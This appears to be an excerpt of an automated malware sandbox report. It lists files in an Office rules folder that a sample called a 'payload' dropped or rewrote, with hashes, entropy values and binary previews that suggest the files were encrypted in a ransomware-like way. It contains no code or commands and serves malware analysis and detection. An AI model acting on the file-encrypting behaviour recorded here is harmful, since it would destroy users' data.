                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule370012v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):732
                                                                                                      Entropy (8bit):7.724192618193026
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:ClJMxosK8wGiqod2EJUd1+b3Z/A0wTMO5O4NOhmZk6lxC4tsB7UK2v6cii9a:CUesnwGiqod2Ead1i3Z/t6MPGkeXsB4w
                                                                                                      MD5:75243C592CE22AC0A8D11668D4C2AE20
                                                                                                      SHA1:D38528B25E442EAB56AF7E961EE4CB5254ACE84F
                                                                                                      SHA-256:FD8C0B1A0F767B4130758181BFF665CEC506B6FC5F86FC920DB67E44B752EEE5
                                                                                                      SHA-512:FE81FF14AB94DC4BDB1AACD97E6670BC7E1B14A996623F174EA9DFC33BFD7539DA3232871828C5A4B5E411379FFD8E8DE4D0F7A531ED40BEA9643DD95537D217
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml...Y.=.}b.....R.}......M.U.e3X..Z...%.....X.....D.o(..w..>"soJ&...<......C..a..d.f....GL...{c+}.c....d1...gS..\.Z.B.K.>..%..:J....F...L..<...W.I...2..d.3...=|..Oh...5..8..sz.c.T...R..[-..$...76...!VJ.....E.n.C.v.w.U._.J...D...p..0.V...TA@G.Y.....T..>;[hlA0.g{D.8...M.aq!..Q;.........9.^.....Y'US...4j.|......u....Ql.8.No........Y...!..z.m.....^........D=..s..j..e"^......U.(V?.n.....b.^....*~....0.$..Q.-....B5../..hbk.k..iL....0.^....A.v6,$......-.a.."AZ...0.A...p~....E..T....r..L.g..!.....B......R..@.-......+....9.PEM/.......@L....D......X.(..gucN8.d.n`...Y..M....u...<~.C.t...p.f.....;w]U...~QyA....hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule390004v3.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3616
                                                                                                      Entropy (8bit):7.952759494488507
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:4dgVgdBHSmgNDS36h7yPcFYe6oLdarYKWO:4+m8Y36huPcFYe6oLdabR
                                                                                                      MD5:C94149249358061C5214C578FEFD9627
                                                                                                      SHA1:2A7E3CBA63CB69387594592E74E36BF96FA1942F
                                                                                                      SHA-256:15FBE8CC8E134CA27429C72D92C905921FD551F8530660B2DF3004A1E596D70C
                                                                                                      SHA-512:AABC5CE05168062FADB179CA78A29399C00F5C6CD52D729AED91AF310CF25D3824F289B14F55199C0C633FEF35177D71C1962BA806254CFB45530766F7FFACAB
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml`.r.<......'..}/..!...%.!......_......p....x\l...'.9r(T..?v...&..5.......\..h/..bs..V...m71.E1..e.......X._....c*.......{....0.b<S....i...T..C..o.CWD......zm&....(...I.s.E.e.......P..3..<.....Zs["..}...g...<W|...2 .b..i.h.{`W3.;+.o...F..B..F...5m..!.q$...k...#a.D....(.u.........|~>...."zq....]^.......w.....+.=Y.P..MU"...xAh...S9.?..>+p...=paJ.R...vGbQei@.<..U...]S{F.....W.(....;.N7...Y.aV.sL....qzI....^...w....X..V..y..m<...N.M..q...F....t.p..6...{.s..i..m......5..q:..+<8...Y...Y...-+.u....rQ..R..KZ..HBp.t.I./.~x^..|.3)gu.....M.6......?.j..T..1..p...O.\.dp...>b......y.P..).\.._...A..Tyx.........x.2..k...:.../..[..[.V.r[..s....Q.....5#@7..EGw....5|..../.G).J....U..d..$D.....[O..U.{...e.....3H....-..P...BbA=.`2zw.m..#...f...&r.....'_......5.......D..... ..`..........t'.....Y..xv.#......zjB.8u....(.9;.v.......gH.t..H..,....S..J...$t....p.3"e..*...q!.$..?........2<qJ.....*..p...4.B.....E.!jZ.7.%..E@.^.<.........'S.+.N.W

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule390005v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):783
                                                                                                      Entropy (8bit):7.699790007517368
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:Q6MWBad1V6imnFztAym3fZ8PAYucPLpyKYAb8CGjBiv6bD:QIBgSbnQyUfZ8VuaLvZGjBiwD
                                                                                                      MD5:A5476C99FC366E2835A22F40C15D368F
                                                                                                      SHA1:75F543CC6E56E8BD8FB1ACD3D23ED5EBCFA9D033
                                                                                                      SHA-256:C7360BBDD069BFAC239A88DFA224FAEBBC33C3EF03CEDB403E3957B7ADC53C16
                                                                                                      SHA-512:90037F76ED82FDA8B79AB4194A64A1DC193EA605749833952373FBD713165E71510239DF854A411B90C462483D28A59C5BAAF4A22A9B57E4CD58A92C7BC19EB5
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlm.^.WYc...ZH..Fx.....a8.@....V.k....H..g.uM6.....fl/Y..E.....P.$B}..2|.}.1..zP.....U..uE.l......&pu.m..m.gF..K......jjYN"w.`r.0Z.....4T...,...v....0H.(.......x{..g.i..Mq.s..\.3S.:.x.@,#.v.Yn0.........\..u.....w.f.ZrR.-.....i....z.u.....HY...a5K..]{....k.^...qOAK....{.u..B..nb..7........l....CK..(....wC~..?...0....v$t...g6.s..7..$I..P.....{Pwd|.....;M.k.R\c..^t_.........<..^f.m.-.....(..i........o...........b..q.}p.!.{..=I3 ....|:..T.].S.m......K.n..dV.h.^...B.../.2..|Z.....Xa........|%N..oy..P....2.0V.ab...Vu......A....,J.$..i..E..7M.....gI.3?.hYSy ..W.....1..`.E...#d.R.8.....il5S.&x.Q...'.;.....'3.*rM7..3..$...z...j>....7..P...a....A.U.5z....-.......!W?.T.....VhZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440000v3.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2331
                                                                                                      Entropy (8bit):7.91978642851493
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:whrXnX+m+bAP+Z8L1H06NotN1n8ZeaaiSo9uep9uVMimP9wD:wxn+m+bAtSJD54Vppuep9uiimW
                                                                                                      MD5:96EF6081B9A035B01EACDFB31BCE84ED
                                                                                                      SHA1:5BB46955480C041406F991D568394891F57D6C12
                                                                                                      SHA-256:857D241BF835CC5710330D2C2021DD457A8893B75FC7A0FBF6CF99F99405BFDF
                                                                                                      SHA-512:C1B52A680023384C1789500B8D7C9DB36F4DA17A6A61CCD3E8E1DE55B5BDC685729EC7E25F912C31DDB587BD5D4F8E9248CDB44E753095E73DAB95A41FC3EB13
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.C......@.+.2R...4....%..4y.....o.R......#.q...vU..W....6....a..Y_.=(...?.D.gg..N.#...df.`..I.Y. ....=..J.d9.w......../i.Tq....MDF....N....9&.G.pJ1.5.Y.....ii.._....+5.u........=..|1.._.1.8.&=b9...)....M..7.)........W.v..Z....IR......c...u6V6_I..p.....H.6.*i6....[.9.ZF..d..s......0g|r.......X..m..7G...?.....7.o{.Iz.,EH....|.j..TXU.q.......i.?^.a..b;.K..K9........FH....ML}.../..W.. Y...9g.....2Vm.D...|...u...f6*.4.....>]....i.[|.0.....P\<Stxs.s..Ph%n.s=. .kf...I...L...9.!......:.......U..:.I......k}.:..fm.N....|....G.{....7.C....KB..).q.>}e..c.u......'./. U.(..SV._.....&...B.,Si....Kt...4\..;.|.*.x.YC.[.........]..k.c.....r@...)!oM..N.....@....U..,..F...E..O.....|,.B...@.. ..q...v.`..@.......}'.3f.'I".Q.x..-.4"........b.....3.w&...2.k.M..p..?....M..n...U..)..R.:,JB.4.g~f....X. ..O2j.......Z..."|(u....(......kS,?#..qnF..2.!...........i.$Z...cU..5.=q.~].(.....<r..1.~l.1(..C..X\O..............W...3./...9.=..Z..)..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440002v9.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):44492
                                                                                                      Entropy (8bit):7.995527215255242
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:768:lfomd7P8/PaGfFjq2sMjXH7lAvGYHMRCiW/zFhhVN9YALRTVaPlT4s5:lfoyD8/Pa4Fjq2dH7lWbHMRCiWPH/YAE
                                                                                                      MD5:FC395E5B6497BAEE898C71D017470900
                                                                                                      SHA1:9845ECB3C87AAD05CBC7B7D96B0E25C48A7FF909
                                                                                                      SHA-256:19E30DE37D91273A35F3523C69656A158E303CC36A93AAD3DBD973F00C105981
                                                                                                      SHA-512:181DC34CAF13A3965DC0B3601C66C87387397F219113800DC0F0217A87C95B5527A3050F38A09266C4C3A51E3D0F73DE8DD8084CC4E80FC28EAE8F2977070E85
                                                                                                      Malicious:true
                                                                                                      Preview:<?xml./.3O....N...$.....I.p..LJA....JX.d.1....G...w.~.95..X..$..h...E........-4..}...L....{........o.f....J;.7.z.|.#78....9^.DH.mL.g...GN.d#.M6l.l.\wTBB8\,3*.t..S.Fd.8W.^w. .......T."..=u-.......l..l ..D.....d...\......[.2^.(..i.'Q......e......x{..y.C....,!...%_!..yh..}.W.:.....[.c.P......%d~(Q..S{..L..72.L....1Y.......P.k.C5..y$O.Y.~.=..t..(}.'..F.^.."........%....B..u7.a..V-.o.....~..9.}.Q..!v...*..0.%.,A..."...Q..U....@H.....z...J....\.\c4...w...`.....@..j......e...'....K;...P...G.........V...j.{.[...B..Pt.&6..f[m.......+^../ [..y.V]...w.~..\.=.Za...d...F6....{.....n..<U.. ....)....l=.....\...%..B.......B .y>WhFI.W......?...4.E.".=.7..="........x..i...NC.y.".....EL.QJ..(z3..v.B.>.....l.0o...426J..tO.?._...... ..yT.p`.....6...P.=.v.R..b.gG.!]....|h.K...o...9..n..{..M....?.wwz.d.(........yC.>..J....l...MMR...>i!....S<_C..Zi-.1..-.j9w.4Z.@9...Z.].0c....#n |...QN...F....1.Q.. ....X.....I.TQD.....N....gV.}.n.E..=....5.2.L.:...1.Yw..S_3_....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440004v3.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2338
                                                                                                      Entropy (8bit):7.922963049516874
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:GRfKLdJV7NL5+ikJ1d9EY4/ByjrA6aZMNS+QI38za3WZ/M2B3wD:GRfKLdXN9JkXd9iBgrtDY+538GS/ZB8
                                                                                                      MD5:4A21ACD9763829CF6D49E829C0A7A827
                                                                                                      SHA1:550772F6CE0D457B915B177DB591252D8BE922D6
                                                                                                      SHA-256:07D6010B82250BC87810B32E32BCD07D5B0AC8EA6F222C39F9AD086F4F503482
                                                                                                      SHA-512:F5A6B0C63FC159DB71C3CA8633270EC65F5ADAAD2A868F051CD8BF63A6F609632C3C24DB6C27AD7BC47E7F57321BEA712C5B01329E504698C8D00D796897AC16
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.V.o..O..8..q|[.A.].....Y.B...V.e..l(.i.Y@...OH.....G.,4,........P..yx.q..47.TX.D.^1ZA...+....h2b7.Gl..$?...)8o.V.={//...I_..CH..Y..uN.p.....v..,..<E....@&.#..*...o._p.....W3...P.MT...{&|.E)c..X.......PN-i.+1....b]...Ls_...k. .....f'+........T..x.......l.z...c...!./Y6..^.$.A....V..~.$.1!.........C'."h$x:.~.oK.6.!.._~...BzD.V.5..C....\.4.#.._T>7.Q,PW..].aR@...tEY.50.^.U~-.....<.Q.G...2.@..!h...l).=...u^b.}T-..*&p.l[..T`..GM...0l.j...'].s5.<......1.U|.5...VbIF.-V...Y...F.S.%......._.>.U\y0.eSq..\.R}9.c.....d..[...u..|e...t...U...v..Jh#KL..~_.sT...i.zSr..v.......}h.4I...."..X.r.......c<.N".fmw.O.c.gm...tO?A2.V3.Z..... =...7+N..v..a."...J.@..'.2"..H1......O..v...X....*.N .d)....@[.....d........V.H9..O|....:...F.X.$..X.ci.@...jZ......C..`....m.....'.H..C..AQ...v...6.#...z&......:..O.....w.0....D7.5...'%.Up`..O1!.=G"V...X..Rz..j3.`(...%.g...0.........}n*.u38|o.s{...:...v....gC.z1[3`.rPS;'........*........."...2,E_K....!=2...|7.Y.V.l.T

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440005v3.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2320
                                                                                                      Entropy (8bit):7.917235866076017
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:dmg1QJ8454c89TVnH30GHhYFbJOigycySJxA2tdDLY7RwD:dkJKc8H0GHSFrhEYe
                                                                                                      MD5:271D5D6E767CC98BA5569EDB17D14B41
                                                                                                      SHA1:FC58268F71BC760D3C39D15ABD3AEB90703D0DA2
                                                                                                      SHA-256:7076658F3E493C4E8AF9510C276F483CA10C49032BA26C21A2E90378FA8B1778
                                                                                                      SHA-512:C6F0B197D95E6EB54DF5DBA53A1811A8CA284BCC1A841F2049078269DD3630B6D0F77C1B0056B82311CAD3B4945698B90C4B2E276BC65375C65FD1386D3CB33C
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml`.IstI...R.o.&q......f.... y......'.(.)^e....H...0\./.q....P....[R....m..Z-..JV....W....g.3.j3K.:@C..K............a.L2@y..j..b....^..p.M!_KT+A.........+.<P.<....W....<Z.[H.......jQ.F.d.o+..D....R...g.j..(k._.....<...Hu..]5....9.6...x..cV...%..p..l.P......I..ta.0k..c......h...s%.]15.eN.{a.Et.aW.1.....(.T.=..U?...../<....W...bb.....O>.*......?.`........rd.,......C...d@.....n.I...o;{.ML..qon..p.X...S.+...H....w.q.|4.w...zo.5EZFwD.x..^*....o...U.)Y..xS.%:X_..n.$..........#..`..%$f8<$.l.@..S:?H...h......j.(N.LQ.[2..[....Xr.^1)X.....&..a..Z;.......C...v..n..>.2.s.......x....#r{.]#.-t..w.-.)q.....<..S..!...F.9./......1J7.d.jd....,.P........I.b....%g..+..^J.7...7y.._......-..:....\l.=+.Y.o$h.(~.c.$MP}+..).~....&H.Am...o..9d|.rZ....Hw)=MR..x.....S.c.......(D.~.r..{..F...d.X.+=q..z.T~...yJ....K..p.L...U..*....E.-r......".....9=........6.'k7%k.....t{....sF-.H34U....e.a....;D..P?.bD(.^E0.k...K.aZ...qN.*......<N..C`T../L..#.5..W.*4Bv..9.^foS

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440007v3.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):41208
                                                                                                      Entropy (8bit):7.995435150915311
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:768:mSLQCdQTwgaXw2U4HsYsskFZznZjR6n8ILjwaFekm7a5pq3RQtHW:GM2wUE3sssZznZN6ZHv4kmmpqhkW
                                                                                                      MD5:4AA485C2EC319801231FC90D6C1364E8
                                                                                                      SHA1:E356530EA21461E9976220FBEBF9616CB62E3616
                                                                                                      SHA-256:DB51A0EC233DB816AC053FE00ED746D04815A490C809209F4FFFCA775365E2ED
                                                                                                      SHA-512:7D29CB0CCBBF5E94F1E9605AE33DF652E3FB9EF15F1FFC20E54031CCD9CA28432856CFCFADF6AB537AE58028A6E69454FBAFED835320AFDE2C73369AAED0F78C
                                                                                                      Malicious:true
                                                                                                      Preview:<?xml,.J..;..........l.....l.........D...F.18(../=.1..Q1)=.......E..)U...v.9.Am.]..-t..\..M.x...:..&n.B... l....|....h.up/..:qW..6..e.>"..(..d(.....2.>U+...."~1..w.p...<...Me. .....A*.0I...O..7.sr...ePp..*..g^.>...H....{_.../.4....xQ..NV..=..%.....6..a..lY>n.....?.v..+.e..{B...H9.[..=),..xl..O.'EcN...yn........:..E....x.Zy...y.|.....)e...?y..+a<s....k.E..P...6\.>.>.C........Ah$G.. .Zk. ..[5zm...0.. h}...o.%...)...[....j..]....x...Tl....ey..q..:..AL..+n...\..c?..w4.....a....p...YG.e....|%...>..DM.zh.-8T.%.zi*-...(7M.dB.7.....#8T]..O...;5.(*...(.mNw.....r..y..k.h.>..../G..y....0c.2..1.L......!....J.>5.w........R....;g.......|.xH.Q...#.|......T.y.xu.M..q.......Q.....n.&.%x.C<...R..:H..j.6).*.4......N`X......).;...T.j./'..Q......O..\.o....>...q.$2.&..R.(.w.J..n~..%}R...4.o.N..o(."..m.2f._.`.j*......J7bA...O....ks..=....$.....f2....I.!NR,..*F.".9.W.X..20,.q...w.3...0....VW...)U...j.Y.f2...L.r........h..X..^5....O.w...t$..<%.{.5.9.........C.E...seWE{..6^

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule460008v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):785
                                                                                                      Entropy (8bit):7.743840104626728
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:MsZano1oU/eYFTXir4/sh2bok98TBjlnPjV6z55/OiUsBi4RUuuY5vWoXqWdjnvk:Y4oWeQyr4/RmjPj0SiUsYZ5WaWFv6bD
                                                                                                      MD5:C67849CF2BD49575E516E7099B2D6A6A
                                                                                                      SHA1:FBDBC95E557A808CBE67F17F89FFDF39CD45CE9F
                                                                                                      SHA-256:FB92AEE5243C5E104239FD008282D2708F5DC8BD3259931328346862FDB82FB2
                                                                                                      SHA-512:1AF06D26929E55A6EDAFCEF9DE8E0BC858FB5837A2C6007584EE4C7DEB408FD501B4A89C0A7C27E3E9FEE9E9C85BF7733E8475C290A2E0CD8B676707AE8019D8
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml,.d."..m.....K...G.>K1......o..@....LnX.3.r_Up..kW..=..v..++..i@..X.bZ.R...S.64=..........:.Z~K..9.3...$...d..o.i.l..4..2..'...H.ki...k.Yh.2^.....x..o._B..U..*..].;.]e.@[.. .......+t_..".D.......+k....-D...?.FPP.a...|.|..]"].I....8..<.Y.(g,].S;..(...v.!..=....|.....^F...I.0.A..h%.. ...0DE..!.`T*'*E.V....$.w\6:......b.Y..8../".....(.g.x..fe.F....,5.I..e.. H..."...L...0a../.........qG..>h.d.Z..:...*G.F..3P....q.v.X..Sk..R|......L...c.>SfY..,...^.{...=.xh....!......>...J<vu%W#..*..N...TS-...`..e...[.S..O....]..*...jo...^f1^....}..9.+1..*"..50m...L.......a....Q.iWL.v.*..qY...&.eH..D. ..E.W.f...t.~....B.E..._(.&F\.....1.(.p..Y..\.A.M..$...q.Y...-..W.......MdE..6n.hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule460009v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):752
                                                                                                      Entropy (8bit):7.716605038242525
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:1xQMegKIeF8YsTibZnrnk4QEdq1i2TLLtZIzd8p/yyxRxmHPtwZ/pgWV6kWT5jBT:1xJc12YV4ewiqLJyzd4/yWRxmGXEPQvk
                                                                                                      MD5:2448515BAC9A7126000618C79D2177C2
                                                                                                      SHA1:1D4131A95AF0049B117180FED8F868047DF40BE3
                                                                                                      SHA-256:1CB873F8A72039DDF5718B2B210EF817CC043481FA00DA2287D09A12DDE7E0AE
                                                                                                      SHA-512:657B310FF3A1C016B64D0CE73FF32A5DFFA2AA2CF61E544AC7AFEC5B44B6817C746E48E30CCC2A0EC31B7E859D61A9B10BA1BA3A58D1F38DF1163E4991B50E81
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..6..k..zu....u..P.e.O..=.6J.....Q...1...4:..:&.nE..w...`.c9L...PT..^R..g......M.D.....bt.[F....KEj.........sF..o.|....O.../#..d....Z...T....\..2..+.8v.[.3..e..M,*.y5m....s.D..C....H.Qg.Y....j.-.....Tm..\Q.`{ut. x....|f.......CP.[K.sSf..R...%...X.o....B./.f..7..!.....9..RNx.H..........0..B+m..x.6..g.}.xnY.....7j.w....v.u:..b.."...9.[...v...0..3.....d..4...[..|...r..S.y.h...4..........K@...G..;9@...&..C4.."d...pN.k.XUtd..S..Q..--.q>T.~......u.i}.Z....HUl"....Q...._T..0.:@.l..Bh.".. ....<.Y;....].]n.=.}%+..v..=.)X.b.{S../.G$].t4.[..|aGD.....zr...%$~...^1..o..Q..y\.>.q...*...4....j.):.N.. ...4....m..Ll6.G.#Mr0./...X.....HhZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490002v13.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1428
                                                                                                      Entropy (8bit):7.872814310519479
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:pJO7Ob3ft1hgmzlW3XUkiWBe6LpOO9tdqMgcBag/c05yfxRIdD1dv6bD:pAaZ1MnsieCMw0tycJRIdwD
                                                                                                      MD5:DD1DC1DD4BC3BBEB28DD3735F36C1C1E
                                                                                                      SHA1:6CE28F3A57C4C36824C7E3CEA838665398B026C7
                                                                                                      SHA-256:CC3FE705A7611D6B8B9EF060CD187296F6149936C81FFE1107A31C2F767AB611
                                                                                                      SHA-512:356C6DD51E3773028E03DC8D1645C5A57518F876C6F23E99EAF07F3F91D2580C0A01B2F79E4B370BF29E693319D3D7271034C90F6DCC2ECB7E738F3FD3A6D835
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml_.r...@..R4U.].*....@....-.*)<.......rSG..C.......]cy...O..ajlA..i.w.R;./.C......Z.]P...M.......KZ....,0S..zEs.x2...."f.Ho.q.o..HI.x.&.".y..e[.8.%v5I...l.K}.)..*..<.h)...pL.....CQ...\O..l}?\..@.qi.......O._.....#2.....Mi.;.R...\.~N...=.+.....A.../.i;.B..7.A{...w.....aT...h.U/u.8........b...'..L....r&pi....G...?`.w`................K.@.....NF......P...Nn...}....*.S_".L.7..(.gjx#x..+1..~.g.....D..k%........5..R;.P.55._...wv...c._...7..0DH...2.2...3.).|..o...'.`gs....{D.>B.g.D<.....L...H..u....S....e.;..C."i"..`k.K.....Nq&....b..Z..=...8y1f...Hp0.....s.|...xodu..].....\..L..Y+.m...wIdo;5..P.....;pW.$O.8R...).=H.)......[.......ZX...p.C2....Y?-=...=...b.`V[. ...h..fr..9...:...Qx..+......xU(.S.Jv.psQ{..`..X8........R.p...........V....*"u6..a...8...........IiZ..0....#7...@y.....z.......OxCg.T.W.x.>..J....^..... A....]O...lYY.*.^..D...a...*.w}..V..g.1..7.5d..*...........o....k.O3.e3P~+..@m..B..t.......V........FJ$...V.0g..K.....K...hE...`......^

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490003v7.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):978
                                                                                                      Entropy (8bit):7.75431841780994
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:qJgF82OENBSrDYBtsuy12WtJ4qnW/CIRn7h1j5bLqU1/Xv6bD:dFGrDYT/y1vqq1sPjdWUFwD
                                                                                                      MD5:C89C4982C31FE5FB4E3A413E2FF932BE
                                                                                                      SHA1:D212405AD2748EAE51649AE58B1306AA0C9879F9
                                                                                                      SHA-256:6D9313895D01B1536FFA823AE95E466726DB6E1111F437E76FB7C26F7B809E1A
                                                                                                      SHA-512:C084846862D67729DB2A5842E953735934D475D3372705E027D1D15C43680903D16F34E2B1CA082CF06BA08E7B6C3D37EBFA15EB0A60E822E95AEB46E34068BE
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..0.R.}.....Q..|.........7A....3...1......wM.zE.....FkQd........`Y....=...j....L..z....[w*.T......2..sV.K..q..eu.V.1w.q.........Z..c>..R.o...&.?`C.Z...A...v;w...8...Fu.8[.s.l..NH#.....m..W..z..-.....]h\6\.....68o.Z.....*.^.[b...q.!.....X...IT.q e.y}0._..Zd...DV...]N.;........H .7..Km9.TO..MW..........6;.w=O.w.^T4.=...j..Z$....P.9\...:.]W.1.G.......o(.J..,...5....v...B.....}<....U.1A/..x.E...$..C.....Z....2;c.j..BHT.._.I.2..4..j.(~D!.oq`E._[tXQ....\.t.vS...YV......d...{..Om\.7..@...z.A....9$<.,.#.._.;.}.?]..q.b...#.\,.R{.......]....Q..;;X.'..)t.....}..&~.)..;,@O.%..HK.I...L..5...z...........x.PO.1.@.I[M.1@C$....#..Df.H..9.W........^....-...|>t...ij...c.y..W.m.yo..t..UF5.../zn<...;.e....o.;..)..O..T..qT.4...|......(.....rd...^fUk.42..> j....=.4L;..9.n...=...+...\9.m....mB.do\..R.2!.]..O.d.P...J.Cnq.....z..6.<.B.11. .V.m..`.LU...[y...hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490004v5.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1008
                                                                                                      Entropy (8bit):7.793656383389148
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:dJo17lzrQWmCg/y8LnZ5/I2FN+ITLQzsJo5QRALv6bD:0Xpm9LTZFIcN+QeooiRALwD
                                                                                                      MD5:406A07DB6584DF7E37187D6627BD743C
                                                                                                      SHA1:BFF0B3D55890423CC22690978E70D9257D924EEB
                                                                                                      SHA-256:3D381A73B45B99ACCBCD51714D6E24F464D9FD9D712366199A4F07C3CC6E92C4
                                                                                                      SHA-512:909F993C5DB498D7C39B5033082C2C0E2BEEE5F8D9F14325DF88D841E15B0F9DC5952551928377548731B010D7A85D6B9B5AC91372B814FF10E9807CE5F8E876
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.x......g...eEK..aQ}Ww....%..D...I.;..A......P..q.e?....H2...u.(...r..Z0..'i@.G..E............\...........K..k...^.Z..bo\.m]..@X,P..A.:.;f.!...#.B$..].....-.......p9..$.-p..p.F.;......\;.,...A.,.I.#.bO.. .Q.yi...M...w._..J..:....D.S.|K*2.f.h..R..j.</ ..4...s......I.\\...}8"...E.o}..6.......Y.N.......{9T..C.....P...WKXk...?.!)=.a}..W....L+k.v..S.j.."'. ..2s}`f=........{h5.7......./....M..A6sFAq......x.."......."KB!.z5.i..FlFm[a82..7M..<....p.7....1..h4=.l4.8....x.}'..\....G....;.<....Nj..@P...u........#L.Z..d.E.%...b......N..GR.A..MT...~..)6n.c[..N.GOc..T.E`UR..;A.I..U.W.CSs...g@ta..+...a...L. ....N..w9~.G..eE........x......1...bl^3!%"."..D...'*kG._..H....s...V..#...J.{....I6U7k..(.4.sC.h..^..{.]h.v.$.6..c..K..q.l..s....e9=..W@fJz.P..'..f.n..8*...%..9.1.A].-:........O!..^LtRJ..h...._|z.9.?.e...K.m=.Y.Oe...]......[A.+.....'...?-z.5.Ehak...7..s..c{L......SI`....)EZ..O..hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B

